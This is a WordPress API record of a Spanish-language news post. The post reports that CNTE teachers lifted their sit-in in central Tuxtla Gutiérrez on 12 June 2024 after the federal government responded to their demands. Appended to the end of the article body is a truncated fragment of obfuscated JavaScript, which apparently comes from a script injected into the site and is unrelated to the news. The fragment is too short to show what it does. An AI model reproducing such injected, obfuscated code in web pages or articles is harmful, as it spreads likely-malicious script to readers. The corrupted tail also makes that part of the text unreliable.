{"id":16084,"date":"2024-06-13T03:19:58","date_gmt":"2024-06-13T03:19:58","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=16084"},"modified":"2024-06-13T03:19:59","modified_gmt":"2024-06-13T03:19:59","slug":"por-fin-maestros-se-retiraron-del-centro-de-tuxtla","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=16084","title":{"rendered":"!Por fin! Maestros se retiraron del centro de Tuxtla"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"682\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718248652925-1024x682.jpg\" alt=\"\" class=\"wp-image-16085\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718248652925-1024x682.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718248652925-300x200.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718248652925-768x512.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718248652925-310x205.jpg 310w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/06\/FB_IMG_1718248652925.jpg 1081w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Rodolfo Flores.<\/p>\n\n\n\n<p>12 de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles 12 de junio, los docentes de la Secci\u00f3n 7 de la CNTE pusieron fin al plant\u00f3n que manten\u00edan en el centro de Tuxtla, desde el pasado 15 de mayo.<\/p>\n\n\n\n<p>Esto luego de la respuesta ofrecida por el gobierno federal al pliego de demandas del magisterio.<\/p>\n\n\n\n<p>Cerca de las 11:30 de la ma\u00f1ana. Los integrantes del Comit\u00e9 Ejecutivo de la Secci\u00f3n dieron cuenta de los resolutivos a los que llegaron en la Ciudad de M\u00e9xico, para despu\u00e9s comenzar a levantar sus campamentos.<\/p>\n\n\n\n<p>Detallaron que el martes la Comisi\u00f3n Nacional de la CNTE se reuni\u00f3 con el mandatario federal, quien les entreg\u00f3 una serie de respuestas a sus demandas, por lo que el magisterio federalizado decidi\u00f3 declarar un receso a su movimiento en la Ciudad de M\u00e9xico, y este mi\u00e9rcoles en estados como Chiapas, Oaxaca y Guerrero.<\/p>\n\n\n\n<p>Sobre la abrogaci\u00f3n de la Reforma Educativa el gobierno federal les inform\u00f3 que fue cancelada, y a la fecha, se han reinstalado a mil 125 trabajadores de la educaci\u00f3n en 25 entidades federativas.<\/p>\n\n\n\n<p>Adem\u00e1s, por causas distintas a dicha reforma fueron cesados en distintas entidades en este sexenio, 176 maestras y maestros, de los cuales ya fueron resueltos 166, quedando pendientes \u00fanicamente 10.<\/p>\n\n\n\n<p>El pr\u00f3ximo 25 de junio se program\u00f3 una nueva mesa de di\u00e1logo con el presidente L\u00f3pez Obrador y la presidenta electa, Claudia Sheinbaum, donde se tiene contemplado abordar las demandas del magisterio en Chiapas.<\/p>\n\n\n\n<p>Una vez que los maestros levantaron sus campamentos personal de limpieza del Ayuntamiento, arrib\u00f3 para levantar algunas tarimas y cartones que hab\u00edan dejado, pero la mayor\u00eda se lo llevaron los manifestantes.<\/p>\n\n\n\n<p>Los docentes de la secci\u00f3n 40, adheridos a la Asamblea Estatal Democr\u00e1tica tambi\u00e9n se fueron.<\/p>\n\n\n\n<p>Cerca del mediod\u00eda la circulaci\u00f3n en la Avenida Central se normaliz\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Rodolfo Flores. 12 de junio del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este mi\u00e9rcoles 12 de junio, los docentes de la Secci\u00f3n 7 de la CNTE pusieron fin al plant\u00f3n que manten\u00edan en el centro de Tuxtla, desde el pasado 15 de mayo. Esto luego de la respuesta ofrecida por el gobierno federal al pliego de demandas &hellip;<\/p>\n","protected":false},"author":2,"featured_media":16085,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":["post-16084","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-tuxtla"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16084","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=16084"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16084\/revisions"}],"predecessor-version":[{"id":16086,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/16084\/revisions\/16086"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/16085"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=16084"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=16084"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=16084"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}